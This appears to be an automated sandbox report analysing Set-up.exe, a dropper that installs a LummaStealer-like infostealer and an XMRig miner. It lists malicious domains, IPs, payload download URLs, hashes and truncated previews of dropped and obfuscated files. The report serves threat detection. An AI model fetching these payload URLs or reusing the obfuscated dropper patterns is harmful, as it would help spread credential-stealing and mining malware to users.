Antivirus detection for dropped file 30->120 122 Multi AV Scanner detection for dropped file 30->122 124 Contains functionality to register a low level keyboard hook 30->124 126 Writes many files with high entropy 30->126 34 cmd.exe 2 30->34         started        signatures16 process17 file18 48 C:\Users\user\AppData\...\file.zip (copy), Zip 34->48 dropped 104 Writes many files with high entropy 34->104 38 7z.exe 2 34->38         started        42 Installer.exe 34->42         started        44 7z.exe 34->44         started        46 13 other processes 34->46 signatures19 process20 file21 54 C:\Users\user\AppData\Local\...\file_11.zip, Zip 38->54 dropped 114 Writes many files with high entropy 38->114 116 Contains functionality to detect sleep reduction / modifications 42->116 56 C:\Users\user\AppData\Local\...\file_10.zip, Zip 44->56 dropped 58 C:\Users\user\AppData\Local\...\Installer.exe, PE32 46->58 dropped 60 C:\Users\user\AppData\Local\...\file_9.zip, Zip 46->60 dropped 62 C:\Users\user\AppData\Local\...\file_8.zip, Zip 46->62 dropped 64 7 other malicious files 46->64 dropped signatures22

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Set-up.exe8%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%AviraTR/Dldr.Agent.vfpsy
    C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe100%AviraTR/Redcap.bgduw
    C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\506033\Limitations.pif5%ReversingLabs
    C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe79%ReversingLabsWin32.Coinminer.XMRig
    C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe92%ReversingLabsWin32.Trojan.LummaStealer
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://sectigo.com/CPS00%URL Reputationsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    goalyfeastz.site
    172.67.145.203
    truetrue
      unknown
      servicedny.site
      unknown
      unknownfalse
        unknown
        IPhwvmMSERoGGfvkQaPBYqP.IPhwvmMSERoGGfvkQaPBYqP
        unknown
        unknownfalse
          unknown
          opposezmny.site
          unknown
          unknownfalse
            unknown
            seallysl.site
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://goalyfeastz.site/apitrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPrInstaller.exe, 00000021.00000002.4017846079.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 00000021.00000000.3736123442.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe.31.drfalse
                  unknown
                  http://www.autoitscript.com/autoit3/JSet-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Limitations.pif, 0000000B.00000000.2200334216.0000000000659000.00000002.00000001.01000000.00000006.sdmp, Amazing.0.dr, Limitations.pif.2.drfalse
                    unknown
                    http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                      unknown
                      http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#Installer.exe.31.drfalse
                        unknown
                        https://sectigo.com/CPS0Installer.exe.31.dr, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                        • URL Reputation: safe
                        unknown
                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                          unknown
                          http://ocsp.sectigo.com0Installer.exe.31.dr, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zX0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                            unknown
                            http://usbtor.ru/viewtopic.php?t=798)ZX0JA3EDV7BU5B3IH21ST0OE852AR.exe, 00000010.00000000.3684789428.0000000000423000.00000002.00000001.01000000.00000007.sdmp, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                              unknown
                              http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0tInstaller.exe.31.drfalse
                                unknown
                                http://nsis.sf.net/NSIS_ErrorErrorSet-up.exefalse
                                • URL Reputation: safe
                                unknown
                                https://www.autoitscript.com/autoit3/Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drfalse
                                  unknown
                                  http://joxi.net/4Ak49WQH0GE3Nr.mp3Installer.exe, Installer.exe, 00000021.00000002.4017846079.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 00000021.00000000.3736123442.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe.31.drfalse
                                    unknown
                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.145.203
                                      goalyfeastz.siteUnited States
                                      13335CLOUDFLARENETUStrue
                                      147.45.47.81
                                      unknownRussian Federation
                                      2895FREE-NET-ASFREEnetEUfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545453
                                      Start date and time:2024-10-30 15:41:18 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 4s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:34
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Set-up.exe
                                      Detection:MAL
                                      Classification:mal100.rans.troj.spyw.evad.winEXE@58/45@5/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 160
                                      • Number of non-executed functions: 261
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Set-up.exe
                                      TimeTypeDescription
                                      10:42:57API Interceptor3883x Sleep call for process: Limitations.pif modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      172.67.145.203GA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                      • www.siasstudios.com/ca63/?RBZh=f0UPKc225NVGsPdWmecsq2bM5j9nL+lbfv0YTlQZMWdhweKjMNfN3RObBk6VEhEywBPiUoxHfA==&Sdl=tl0DiN8Ph
                                      147.45.47.81inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                      • 147.45.47.81/conhost.exe
                                      BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                      • 147.45.47.81/xmrig.exe
                                      SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exeGet hashmaliciousLummaC, XmrigBrowse
                                      • 147.45.47.81/xmrig.exe
                                      installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      conhost.exeGet hashmaliciousXmrigBrowse
                                      • 147.45.47.81/xmrig.exe
                                      Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                                      • 147.45.47.81/WinRing0x64.sys
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      FREE-NET-ASFREEnetEUla.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                      • 193.233.45.230
                                      2QPrBtk3J8.exeGet hashmaliciousUnknownBrowse
                                      • 147.45.48.137
                                      v9dVG4fAGa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • 147.45.48.137
                                      LkCinYWgNh.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • 147.45.48.137
                                      v9dVG4fAGa.exeGet hashmaliciousClipboard HijackerBrowse
                                      • 147.45.48.137
                                      LkCinYWgNh.exeGet hashmaliciousClipboard HijackerBrowse
                                      • 147.45.48.137
                                      2QPrBtk3J8.exeGet hashmaliciousClipboard HijackerBrowse
                                      • 147.45.48.137
                                      x86.elfGet hashmaliciousMiraiBrowse
                                      • 193.233.193.45
                                      x86.elfGet hashmaliciousUnknownBrowse
                                      • 193.233.193.45
                                      arm5.elfGet hashmaliciousUnknownBrowse
                                      • 193.233.193.45
                                      CLOUDFLARENETUShttps://www.guidedtrack.com/programs/n5snx1a/runGet hashmaliciousUnknownBrowse
                                      • 162.247.243.29
                                      Setup.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.53.206
                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      Setup.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.142.84
                                      rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 188.114.96.3
                                      https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamicsGet hashmaliciousUnknownBrowse
                                      • 104.17.24.14
                                      https://onedrivefileaccess.uwu.ai/Get hashmaliciousUnknownBrowse
                                      • 172.64.154.239
                                      https://cruparcellaire-my.sharepoint.com/:u:/g/personal/dani_grandrcu_com/EffQlMxf6g9Hiljl1DzmuTcB4-lo0t9ejs2hIBwCnQfe1g?e=TtenDjGet hashmaliciousUnknownBrowse
                                      • 104.17.24.14
                                      0T32Kz4dZU.exeGet hashmaliciousStealc, VidarBrowse
                                      • 172.64.41.3
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      Setup.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 172.67.145.203
                                      nG1F5SUnsm.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      byamPER0Gx.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, MofksysBrowse
                                      • 172.67.145.203
                                      4RNoaB1aYY.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      3B9m4uNqHe.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.145.203
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\506033\Limitations.pifburlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                        burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                          DA92phBHUS.exeGet hashmaliciousXWormBrowse
                                            Okfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                              1XZFfxyWZA.exeGet hashmaliciousRedLineBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                  ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                    1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                      1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                        C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeinject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Joe Sandbox View:
                                                          • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                          • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                          • Filename: DA92phBHUS.exe, Detection: malicious, Browse
                                                          • Filename: Okfjk1hs4kdhs2.exe, Detection: malicious, Browse
                                                          • Filename: 1XZFfxyWZA.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: ZnPyVAOUBc.exe, Detection: malicious, Browse
                                                          • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                          • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):527849
                                                          Entropy (8bit):7.99963669575995
                                                          Encrypted:true
                                                          SSDEEP:12288:J29Twvpeg9ZHdHBRWPtI2bw61ZEu30UU9Zy299hqZcTG:J29EvxnH6PG2bw6f36w6hx6
                                                          MD5:BF81D90A17A275A5E00BDA68B828D679
                                                          SHA1:091335A746471E483549D6BCF9E219701BA3D432
                                                          SHA-256:F53CB183C75EE4337CBDB5D838085432F44D64F992894E09219799573FF3D745
                                                          SHA-512:79CC1B0919BE92997AA8727B7437C71F6DD7FE4419584CA1301F421985460D7436D818A0EA001C2A3DF8852D33C958A3B66BC786AA1FFC23B9C417AFE44F079F
                                                          Malicious:true
                                                          Preview:tc....).N~=..KD...I...=...YZ.G..g.7E.. .c..g..]...gJ...5...y...c'...#>.KG".....v..]/r.._h..w................O..Y........a\..^&E5Rp#.*D..V.Rlbs..2|.......gO.......}..;.j..wH4.i.H+.M...R.(.`;Wv..vv.!.A....Y..y.o.y._.M.v%c^..Bx...w..'.hO..7..[cy...^.(.L.B.fo.,.G*.....m...i}k...b.z.+.N.t+A..!..Br1b.....M..l.:.H.&...v..;c..(..]:...E.q...........Z2V....W.%....dN..@.>..&..H.........c..l.......P.L .7...K.`......Ie.d.%...............b..n...y...X.*.i...c.....h... .nHHbM...k.P.....m...(...^P...U.x.....<''....c.\..#*.x.-.....T..r5..h......gD.y.G~{.N8%du..QI..-..FR...Gq....rd.....$..;..p.g...9..2.S..`.{..*l?...Q..N...\=..r.#y1.BI^{GV|hB.E.'..3..d.pRzS#...`#.;.r...;=..5....>...M....Xs......br.K...'...E<....!~...}.#..:.<nFd..,.;X\......#.t..g#..t.....G......B%[..F.......8.t..yM=g}.....\.wJ...o..X\[..0..u...4e....G3.cH.>..O...F ..p....s.H...].+-..$...U.y.%...N.t#LT..4.....(.u#.4?..L..3.+MR8...k....Sd..*...r.....'8.!.{.rI.(&..D..}j.C...(.KJ\D...2T.KFJ
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):885821
                                                          Entropy (8bit):6.622029789858432
                                                          Encrypted:false
                                                          SSDEEP:12288:tV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:fxz1JMyyzlohMf1tN70aw8501
                                                          MD5:96DA1913A864681EE711C548E2E2238F
                                                          SHA1:FF4F32B8A31D44E11B91F45C3B6335E9F6B99190
                                                          SHA-256:00431A18F3A424C5251AEF684F6F79B6F3ADC51CD79A4A59FD3B1AA17E4E6B0A
                                                          SHA-512:D899337045A2CE5233E029FFFD28C0D281C1EF33B5CE4EEFC05437C34C75AF27CB171ED326C4565FE77FE58E18CCD8A2C9538BD915C7FFAEBC6D637687885BEC
                                                          Malicious:false
                                                          Preview:..wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V..
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66025
                                                          Entropy (8bit):7.997413718649764
                                                          Encrypted:true
                                                          SSDEEP:1536:2ZSlBOQDDdShfhpZBIlExk1tLCaW7FvMGLE1Mgv:28/xShfuEG1ZVW7FTG
                                                          MD5:1F976113C41E03AE0F860FE5F27741BB
                                                          SHA1:2C01491AD17939388F84C1E3491D95D68B327D88
                                                          SHA-256:A36617F6C29798F12CB2812E5B008F8DAC3F7573845F6DB4ABB470181D0BCD88
                                                          SHA-512:F8DDBAEB6F939A02940B167F0FFB2CC6370C97326C4437626A91050FFA4944DF4964674EB6A7D073564E9CD7E08705C8750924A5C68FE2365371E8C607F1BCB1
                                                          Malicious:true
                                                          Preview:..$..u..?...*.X~.........,..1..V....o.s.^4D.(...>.I....[t..+.g8C.y$m`3.YX......[.J._..b...g..~...}...L.M".BF.*<.........D.......'...m{.p.;.X.^..t....E.^..<.a....hw.."......-..k.[..k7 (.....N.=.=.T..F...)..._9...Jt.0. .S....r.?8.I..z.....AS..T>...L..~...7._zQu.cW.b. ....q.::.^..Ev..k.,...E........1..K..J..D..e..U.......3?C.j" !..t..X......_...C...E....1\.<.B_..\#.?...@.o.._.....O....FFR..&"..0R..../t.-........Y..P....(......I..K.b._<..@.c~..u..8.j....?.m.wy\..7.H.....'..n':..Ne..T...p5...2..~..:.................C.o...Q....G....r..G!=0...l..KAV...)*P....d. ...r..7...R1..d.WX..U.JX`.^...S~.V...t..^j.yE<.{.8x...g./|..@2.wi........... ..Q.'...M.AJ.[..l....Ss....'q.....`L.l..-.DyVr...""`....n.....)ui!....[-.......`..EWD=jAO..EB..g...`...%..b.a.....x.......#..^......-}MX...i.|k8q.T...\.8....."..<d..q.['...F.g.1ECH.zp.W..0Ym.....V...Hb.[.&...}...bn..@z..{.J.....N.P.P...y.......<.h.. b.2M..i.n...WD..vH.....*og>."......P...Dh..j.......{.....
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7818
                                                          Entropy (8bit):6.237595357516947
                                                          Encrypted:false
                                                          SSDEEP:192:QHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3yf:QHAHhww+/2nlP3r1WAL3yf
                                                          MD5:A859DCB8851A492727B3974B59E9A31F
                                                          SHA1:EF01C303D5FA1DB3E271AEA415DBE9A6D987E1C4
                                                          SHA-256:282577ED97418A10EF4FF63FC9A6883510F6BA83E71EBFFCBBE8EAF5D6508F50
                                                          SHA-512:207F4564AA0A52AEA8D3097E950523599A3C64AF74E4C117CA3B754E90E36A770171A34EC815E4788230A5B7AE961CDE8962C280ED5360275432DA97447087FF
                                                          Malicious:false
                                                          Preview:RubberBrilliantPoliceOperator..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11910
                                                          Entropy (8bit):5.160499835608725
                                                          Encrypted:false
                                                          SSDEEP:192:d/+FOk7Wflp+LOD89LUGh9ywTaukHrxXuSeQCq/TPQ0ykX6y6PAqsUtrzPjxCfWX:N7k7WtFDwLPXywTaTLx+LUr3nKPjE+X
                                                          MD5:B4448F5BA35506A1F0EF3FC9B448CF76
                                                          SHA1:E07E849A7D2636892C45A7C8BED8D01CE4A3ECC2
                                                          SHA-256:BE0A3CD609196ACE836A2FF5982549FAA8F7E8F58DF7963A533C12AE79EED7C3
                                                          SHA-512:A1C24BBA6D87AC72976778DF8A643BF7E00366D8B71C1D64AADAA647E67F89809A1556BE940370AC5EB73D8F83818E895C099BC98CCA88C738C0367D244EC50B
                                                          Malicious:false
                                                          Preview:Set Pushing=1..EzLMDemonstrated-Submitting-Diy-Nottingham-Assets-..PYBars-Mu-Rapid-Philip-Coal-Suffer-Determined-Norm-..gHXDealtime-Typically-Guide-Forest-Kde-Bug-Searching-..PmBRestructuring-Pencil-Way-Metallica-Grenada-Record-Indians-Brochure-..kMuGFlorence-Metal-Why-..byAnFault-Cop-Programmer-Local-Po-Comedy-..Set Shown=i..MnRio-Points-Lamps-..ooProof-Pioneer-..pdwFs-Roughly-Tvs-..cZBpGeneral-Rice-Texts-Milwaukee-Confirmed-Kits-Lane-Cloud-Hopkins-..RtuGVpn-Discounts-..Set Venture=j..xLWindows-Transit-..eGRwDeer-Linked-Mf-Foods-Bennett-Single-Total-Towers-..uhhDSixth-..uvtStock-Air-Verbal-Pathology-Sol-Apart-..YBoQHire-Terrorists-Strain-Enhance-..vAcNRegional-Trans-Cb-Investor-Nextel-Walked-..CWRequirement-Hardly-..kDLouisville-Applies-Bs-Valued-Gg-Productive-Employment-Through-Specials-..Set Lows= ..NEmbFalling-Ideal-Motorola-Spend-..bPaMotorcycle-Portsmouth-Humanities-Combination-Copying-Traffic-..cvDeaths-Stories-Postage-Io-Breeding-..dtLan-..vUtpJason-Entries-Genre-Actions-Travel
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11910
                                                          Entropy (8bit):5.160499835608725
                                                          Encrypted:false
                                                          SSDEEP:192:d/+FOk7Wflp+LOD89LUGh9ywTaukHrxXuSeQCq/TPQ0ykX6y6PAqsUtrzPjxCfWX:N7k7WtFDwLPXywTaTLx+LUr3nKPjE+X
                                                          MD5:B4448F5BA35506A1F0EF3FC9B448CF76
                                                          SHA1:E07E849A7D2636892C45A7C8BED8D01CE4A3ECC2
                                                          SHA-256:BE0A3CD609196ACE836A2FF5982549FAA8F7E8F58DF7963A533C12AE79EED7C3
                                                          SHA-512:A1C24BBA6D87AC72976778DF8A643BF7E00366D8B71C1D64AADAA647E67F89809A1556BE940370AC5EB73D8F83818E895C099BC98CCA88C738C0367D244EC50B
                                                          Malicious:false
                                                          Preview:Set Pushing=1..EzLMDemonstrated-Submitting-Diy-Nottingham-Assets-..PYBars-Mu-Rapid-Philip-Coal-Suffer-Determined-Norm-..gHXDealtime-Typically-Guide-Forest-Kde-Bug-Searching-..PmBRestructuring-Pencil-Way-Metallica-Grenada-Record-Indians-Brochure-..kMuGFlorence-Metal-Why-..byAnFault-Cop-Programmer-Local-Po-Comedy-..Set Shown=i..MnRio-Points-Lamps-..ooProof-Pioneer-..pdwFs-Roughly-Tvs-..cZBpGeneral-Rice-Texts-Milwaukee-Confirmed-Kits-Lane-Cloud-Hopkins-..RtuGVpn-Discounts-..Set Venture=j..xLWindows-Transit-..eGRwDeer-Linked-Mf-Foods-Bennett-Single-Total-Towers-..uhhDSixth-..uvtStock-Air-Verbal-Pathology-Sol-Apart-..YBoQHire-Terrorists-Strain-Enhance-..vAcNRegional-Trans-Cb-Investor-Nextel-Walked-..CWRequirement-Hardly-..kDLouisville-Applies-Bs-Valued-Gg-Productive-Employment-Through-Specials-..Set Lows= ..NEmbFalling-Ideal-Motorola-Spend-..bPaMotorcycle-Portsmouth-Humanities-Combination-Copying-Traffic-..cvDeaths-Stories-Postage-Io-Breeding-..dtLan-..vUtpJason-Entries-Genre-Actions-Travel
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):71680
                                                          Entropy (8bit):7.997730500056973
                                                          Encrypted:true
                                                          SSDEEP:1536:F7Z8MYJJghqD1LQ2aEJ4HHLIp/VqEFo+8ZBS653KK8E:F7PYucLZWqqEFhs0YWE
                                                          MD5:D1C282A44CBF9D09062B8ED3D659EF00
                                                          SHA1:E3C996E17FD49277E10496B89D2A7CCB5B647CE7
                                                          SHA-256:EF626117B4F5882063F7884FBBD8411E3F11382270EF3C5FF189366B0B65F844
                                                          SHA-512:FC63BD3A0FCA0934602978689D601808F6AE3FAE045D22EC13A72FEC9BE0CB90D7D5A01C4CE780527D323CED65FBAB75C6CC62DF0110B6C602BB04AE793A46B5
                                                          Malicious:true
